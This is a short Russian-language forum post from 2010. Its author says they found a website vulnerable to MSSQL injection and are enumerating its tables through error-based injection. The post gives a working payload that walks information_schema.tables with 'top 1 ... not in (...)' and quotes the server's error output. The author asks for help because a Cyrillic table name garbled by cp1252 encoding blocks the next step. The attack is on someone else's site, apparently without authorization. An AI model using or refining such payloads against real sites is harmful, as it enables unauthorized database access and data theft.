09.03.2010, 01:35
|
|
Участник форума
Регистрация: 18.08.2008
Сообщений: 159
С нами:
9332069
Репутация:
92
|
|
Нашел сайт с mssql injection. Перебираю таблицы, но с кодировкой что-то не то. Вроде стоит cp1252
.
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'Çàïðîñ_Ñòàäèè_Êëèåíò' to a column of data type int.
Подставляю это значение в запрос
1 or 1=(select top 1 table_name from information_schema.tables where table_name not in ('rank_table','reklama','Çàïðîñ_Ñòàäèè_Êëèåíò'))
Получаю тоже самое.
Расшифровываю, получаю Запрос_Стадии_Клиент. Пихаю в запрос. Опять та же самая ошибка. Не знаю что делать дальше, помогите, пожалуйста. |
|
|